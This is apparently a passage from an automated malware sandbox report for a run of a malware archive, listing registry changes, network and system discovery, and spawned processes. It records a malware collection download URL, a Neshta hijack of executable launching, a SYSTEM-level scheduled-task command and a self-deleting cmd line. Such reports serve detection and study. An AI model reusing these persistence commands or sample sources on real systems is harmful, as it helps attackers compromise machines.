| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netstat.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Accessibility\Blind Access\On = "1" | C:\PROGRA~3\QQOFCC\TSH.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \Registry\User\S-1-5-21-2410826464-2353372766-2364966905-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Windows\SysWOW64\cscript.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133764986931068927" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\3582-490\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Admin\Desktop\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Public\Video\frame.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Bazaar.2020.08.7z:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\PROGRA~3\QQOFCC\TSH.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskmgr.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\HEUR-T~3.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\HEUR-B~1.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\M2d9\IconCache3frdbf.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | C:\Windows\SysWOW64\cscript.exe | N/A |
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.08.7z"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.08.7z
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1856 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd7ecd67-1eb6-42d4-ac7e-2a1027c4087f} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2384 -parentBuildID 20240401114208 -prefsHandle 2376 -prefMapHandle 2368 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0325a52d-f779-4779-beb9-0ac47768324a} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2924 -childID 1 -isForBrowser -prefsHandle 2944 -prefMapHandle 2656 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb4fec81-e24b-4592-ac6f-2774b281a27a} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3616 -childID 2 -isForBrowser -prefsHandle 3608 -prefMapHandle 3604 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28813e2a-d48b-47d4-8220-63400c982e34} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4200 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4268 -prefMapHandle 4260 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a67f143f-186b-4ca1-a343-275af2fe41ab} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5656 -childID 3 -isForBrowser -prefsHandle 5680 -prefMapHandle 5700 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e035b85-6e59-42db-8872-8606e4a9767b} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5676 -childID 4 -isForBrowser -prefsHandle 5844 -prefMapHandle 5848 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a57ac182-3e12-44ad-af0c-07805679b12d} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6104 -childID 5 -isForBrowser -prefsHandle 6004 -prefMapHandle 6008 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e6f8d9c-b6cb-43d8-94ba-e23d1d642ad7} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Bazaar.2020.08.7z"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ffb74b2cc40,0x7ffb74b2cc4c,0x7ffb74b2cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1800,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1804 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2056,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2176,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2212 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4456 /prefetch:1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zO4E8D6D39\waiting.jse"
C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe
"C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Public\Video\frame.exe"
C:\Users\Public\Video\frame.exe
C:\Users\Public\Video\frame.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Public\Video\lphsi.exe"
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Public\Video\movie.mp4"
C:\Users\Public\Video\lphsi.exe
C:\Users\Public\Video\lphsi.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Public\Video\hrss.exe"
C:\Users\Public\Video\hrss.exe
C:\Users\Public\Video\hrss.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004EC 0x00000000000004CC
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-E~1.EXE"
C:\Users\Admin\Desktop\HEUR-E~1.EXE
C:\Users\Admin\Desktop\HEUR-E~1.EXE
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\system32\ipconfig.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 716
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\UDS-TR~1.EXE"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4840,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~1.EXE"
C:\Users\Admin\Desktop\HEUR-T~1.EXE
C:\Users\Admin\Desktop\HEUR-T~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\PROGRA~3\QQOFCC\TSH.exe"
C:\PROGRA~3\QQOFCC\TSH.exe
C:\PROGRA~3\QQOFCC\TSH.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~1.EXE"
C:\Users\Admin\Desktop\TROJAN~1.EXE
C:\Users\Admin\Desktop\TROJAN~1.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4976,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5036 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4644 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5036 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4216 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3372,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5164,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4252 /prefetch:2
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~2.EXE"
C:\Users\Admin\Desktop\TROJAN~2.EXE
C:\Users\Admin\Desktop\TROJAN~2.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~3.EXE"
C:\Users\Admin\Desktop\TROJAN~2.EXE
C:\Users\Admin\Desktop\TROJAN~2.EXE /C
C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn ufjbzpzn /tr "\"C:\Users\Admin\Desktop\TROJAN~2.EXE\" /I ufjbzpzn" /SC ONCE /Z /ST 14:07 /ET 14:19
C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe /C
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~3.EXE"
C:\Users\Admin\Desktop\HEUR-T~3.EXE
C:\Users\Admin\Desktop\HEUR-T~3.EXE
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~4.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~4.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~4.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~4.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~4.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TR3020~1.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TR3020~1.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-H~1.EXE"
C:\Users\Admin\Desktop\HEUR-T~3.EXE
"C:\Users\Admin\Desktop\HEUR-T~3.EXE"
C:\Users\Admin\Desktop\HEUR-T~3.EXE
"C:\Users\Admin\Desktop\HEUR-T~3.EXE"
C:\Windows\SysWOW64\cscript.exe
"C:\Windows\SysWOW64\cscript.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\Desktop\HEUR-T~3.EXE"
C:\Users\Admin\Desktop\TROJAN~2.EXE
C:\Users\Admin\Desktop\TROJAN~2.EXE /I ufjbzpzn
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\TEMP\3582-490\TROJAN~2.EXE" /I ufjbzpzn
C:\Windows\TEMP\3582-490\TROJAN~2.EXE
C:\Windows\TEMP\3582-490\TROJAN~2.EXE /I ufjbzpzn
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\BACKDO~1.EXE"
C:\Users\Admin\Desktop\BACKDO~1.EXE
C:\Users\Admin\Desktop\BACKDO~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~3.EXE"
C:\Users\Admin\Desktop\HEUR-T~3.EXE
C:\Users\Admin\Desktop\HEUR-T~3.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-E~2.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-B~1.EXE"
C:\Users\Admin\Desktop\HEUR-B~1.EXE
C:\Users\Admin\Desktop\HEUR-B~1.EXE
